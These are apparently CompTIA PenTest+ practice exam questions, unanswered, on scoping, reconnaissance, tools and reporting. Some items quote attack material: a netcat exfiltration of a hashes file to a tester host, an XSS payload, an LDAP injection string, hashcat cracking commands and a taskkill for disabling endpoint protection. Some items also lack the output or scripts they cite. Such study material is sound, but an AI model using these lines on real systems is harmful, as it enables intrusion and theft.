Test F CompTIA pentest+ PT0-002

A penetration tester needs to perform a vulnerability scan on a highly critical and fragile infrastructure system. Which of the following should the penetration tester do to minimize the risk?. Implement query throttling. Use high-bandwidth scanning techniques. Enable aggressive and indiscriminate scanning options. Use a SYN flag to avoid detection.

A penetration tester discovers a login page during an assessment. Which of the following tools would the tester use to brute force a password?. Hydra. Wireshark. SQLmap. TinEye.

A penetration test is in the scoping phase of an engagement. Which of the following describes how a penetration tester would most effectively obtain the information necessary to begin testing?. Wait for the client to tell them. Start an email chain so communications are documented. Ask previous penetration test providers what they looked at. Send a preengagement survey to the client to fill out.

A penetration tester would like to know if any web servers or mail servers are running on the in-scope network segment. Which of the following is the best to use in this scenario?. ARP scans. Website crawling. DNS lookups. Nmap probes.

During an engagement with a financial institution, a penetration tester found hard-coded credentials in a publicly accessible code repository. Those credentials allowed the penetration tester to access PII from many of the institution’s customers and services that are hosted by a cloud provider. Which of the following actions should the penetration tester do next?. Proceed with the engagement and add the evidence in the final report. Keep the found credentials and use them during the engagement. Disclose the findings through a bug bounty platform. Report the findings to the customer’s technical contact immediately.

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server’s name. Which of the following is the best way for a penetration tester to exploit this situation?. Relay the traffic to the real file server and steal documents as they pass through. Host a malicious file to compromise the workstation. Reply to the broadcasts with a fake IP address to deny access to the real file server. Respond to the requests with the tester's IP address and steal authentication credentials.

A security analyst is conducting a penetration test for an online store with a database server. Which of the following tools would best assist the tester in detecting vulnerabilities on that server?. Burp Suite. Nessus. Nikto. SQLmap.

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field: IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");>originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ");>" When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?. SQL injection. Command injection. Cross-site request forgery. Cross-site scripting.

Which of the following legal concepts specifically outlines the scope, deliverables, and timelines of a project or engagement?. MSA. NDA. SLA. SOW.

A client claims that a ransomware attack has crippled its corporate network following a penetration test assessment. Which of the following is the most likely root cause of this issue?. Client reluctance to accept findings. Lack of attestation. Incomplete data destruction process. Failure to remove tester-created credentials.

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?. Bluejacking. Bluesnarfing. BLE attack. WPS PIN attack.

A penetration tester runs an Nmap scan and obtains the following output: Which of the following should the penetration tester run next to explore this host further?. OpenVAS. BloodHound. DirBuster. Nikto.

A penetration tester is conducting a physical test against an organization. During the first day of the assessment, the tester follows an employee to the coffee shop next door. While the employee is ordering, the tester stands near the employee and captures the employee's badge electronically. Which of the following exploits is the penetration tester most likely conducting?. Tailgating. Bluesnarfing. RFID cloning. Session hijacking.

As part of an active reconnaissance, a penetration tester intercepts and analyzes network traffic, including API requests and responses. Which of the following can be gained by capturing and examining the API traffic?. Assessing the performance of the network's API communication. Identifying the token/authentication detail. Enumerating all users of the application. Extracting confidential user data from the intercepted API responses.

Which of the following is a declaration from an independent third party that lends credibility to the part of the organization undergoing the review and is required as part of an audit?. Executive summary. Client acceptance. Attestation of findings. Lessons learned.

During an assessment, a penetration tester discovers the following code sample in a web application: "(&(userid=*)(userid=*))(|(userid=*) (userPwd={SHA1}a9993e364706816aba3e25717850c26c9cd0d89d==))"; Which of the following injections is being performed?. Boolean SQL. Command. Blind SQL. LDAP.

A penetration tester gained access to one of the target company's servers. During the enumeration phase, the penetration tester lists the bash history and observes the following row: curl -k 'imaps://10.12.14.121' --user jsmith:Blu3moon -v Which of the following steps should the penetration tester take next?. Brute force all mail users. Enumerate mall server users. Attempt to read email. Download hashes.

A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part of the password is Winter followed by four digits and a special character at the end. Which of the following commands should the tester use?. john hash.txt --format=MD5 --wordlist=seasons.txt --fork=8 --rules=base64. hashcat hash.txt -m 0 -a 6 seasons.txt ?d?d?d?d?s. john hash.txt --format=Raw-MD5 --rules=jumbo --wordlist=seasons.txt. hashcat hahs.txt -m 500 -a 7 --force -) -w 4 --opencl-device-types 1,2.

A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next?. Vishing. Watering hole. Whaling. Spear phishing.

Which of the following best explains why a penetration tester would use ProxyChains during an assessment?. To harvest credentials. To use remote access tools. To fingerprint the organization. To automate protocols.

A penetration tester gets a shell on a server and runs the following command: nc kaliworkstation 4444 < hashes.txt The penetration tester runs the following command on a Kali workstation: nc -nlvp 4444 > hashes.txt Which of the following best describes what the penetration tester is attempting to do?. Exfiltrate a file from the server. Obtain a higher privilege reverse shell. Copy a file to the target server. Delete a file from the Kali workstation.

Which of the following components should a penetration tester most likely include in a report at the end of an assessment?. Metrics and measures. Client interviews. Compliance information. Business policies.

In a standard engagement, a post-report document is provided outside of the report. This document: • Does not contain specific findings • Exposes vulnerabilities • Can be shared publicly with outside parties that do not have an in-depth understanding about the client's network Which of the following documents is described?. Attestation letter. Findings report. Executive summary. Non-disclosure agreement.

A penetration tester is configuring a vulnerability management solution to perform a scan of Linux servers on an enterprise network. The client wants to reduce potential disruptions as much as possible. Which of the following types of accounts should the tester use?. Read-only user. SSH LDAP user. Domain administrator. Unprivileged user.

A penetration testing team has gained access to an organization's data center, but the team requires more time to test the attack strategy. Which of the following wireless attack techniques would be the most successful in preventing unintended interruptions?. Captive portal. Evil twin. Bluejacking. Jamming.

A penetration tester is looking for a particular type of service and obtains the output below: Which of the following commands was executed by the tester?. nmap -sU -pU:517 -Pn -n --script=supermicro-ipmi-config. nmap -sU -pU:123 -Pn -n --script=ntp-monlist. nmap -sU -pU:161 -Pn -n --script=voldemort-info. nmap -sU -pU:37 -Bn -n --script=icap-info.

A penetration tester is troubleshooting the right value for the urls variable that should be used in the following script: Which of the following instructions in a Python script will prevent duplicate entries in the output and work with the script above?. [u for u in url_list if u not in url_list]. list({u: True for u in url_list}.keys()). f"{u: True for u in url_list}". json.dumps({u: True for u in url_list}.keys()).

While performing reconnaissance, a penetration tester runs Nmap and receives the following output: Nmap scan report for samplescan.org (44.33.55.66) Host is up (0.025s latency). Not shown: 992 closed tcp ports (conn-refused) PORT STATE - 22/tcp open 23/tcp open 80/tcp open 443/tcp open Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds Which of the following ports should the penetration tester sniff the traffic on to obtain sensitive information?. 22. 23. 80. 443.

During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet site as part of a standard procedure. Which of the following should the penetration tester recommend for this type of finding?. Password encryption. Role-based access control. Secrets management solution. Time-of-day restrictions.

A penetration tester discovers that an organization's infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabilities? (Choose two.). Virtualization. Kubernetes. Docker. BIOS. UEFI. DNS.

Given the following table: Which of the following data structures would most likely be used to store Known-good configurations of firewall rules in a Python script?. Lists. Trees. Dictionaries. Tuples.

Which of the following tools would be best to use to conceal data in various kinds of image files?. Kismet. Snow. Responder. Metasploit.

A penetration tester runs a reconnaissance script and would like the output in a standardized machine-readable format in order to pass the data to another application. Which of the following is the best for the tester to use?. JSON. Lists. XLS. Trees.

Which of the following best explains why communication is a vital phase of a penetration test?. To discuss situational awareness. To build rapport with the emergency contact. To explain the data destruction process. To ensure the likelihood of future assessments.

Which of the following describes how a penetration tester could prioritize findings in a report?. Business mission and goats. Cyberassets. Network infrastructure. Cyberthreats.

A penetration tester is doing an assessment for a company that requires an external command-and-control server. The command-and-control tool should be able to use multiple types of payloads (PowerShell, SMB, and binaries) and centralize the management of compromised systems. Which of the following tools should the tester use?. BeEF. Covenant. Censys. Reaver.

A penetration tester is gathering information about a target company for a penetration test in order to tailor the type of attacks. However, the tester is worried about sending packets to the company that could tip off the SOC before the attacks begin. Which of the following sources should the tester use to achieve this objective?. Nmap. Shodan. CeWL. Nessus.

Which of the following documents should be consulted if a client has an issue accepting a penetration test report that was provided?. Rules of engagement. Signed authorization letter. Statement of work. Non-disclosure agreement.

A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?. The penetration tester misconfigured the network scanner. The network scanning tooling is not functioning properly. The IP ranges changed ownership. The network scanning activity is being blocked by a firewall.

After successfully compromising a remote host, a security consultant notices an endpoint protection software is running on the host. Which of the following commands would be best for the consultant to use to terminate the protection software and its child processes?. taskkill /PID /T /F. taskkill /PID /IM /F. taskkill /PID /S /U. taskkill /PID /F /P.

During a penetration test, a security consultant needs to automate the hash calculation of each password in a text file and store the results in memory. Which of the following Python snippets should the tester use to accomplish this task?. with open('passwords.txt') as f: lines = f.readlines() hashes = [hashlib.sha256(password).hexdigest() for password in lines]. with open('passwords.txt') as f: lines = f.readlines() hashes = [hashlib.sha256(line).hexdigest() for password in lines]. with open('passwords.txt') as f: lines = f.readlines() hashes.append(hashlib.sha256(lines) .hecdigest()). with open('passwords.txt') as f: lines = f.readlines() hashes['result'] = hashlib.sha256(lines) .hexdigest().

During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would achieve this task?. for i in range(1000, 2001): s = socket(AF_INET, SOCK_STREAM) conn = s.connect_ex((host_IP, i)) if (conn == 0): print(f'Port {i} OPEN') s.close(). for i in range(1001, 2000): s = socket(AF_INET, SOCK_STREAM) conn = s.connect_ex((host_IP, i)) if (conn == 0): print(f'Port {i} OPEN') s.close(). for i in range(1000, 2001): s = socket(AF_INET, SOCK_DGRAM) conn = s.connect_ex((host_IP, i)) if (conn == 0): print(f'Port {i} OPEN') s.close(). for i in range(1000, 2000): s = socket(SOCK_STREAM, AF_INET) conn = s.connect_ex((host_IP, i)) if (conn == 0): print(f'Port {i} OPEN') s.close().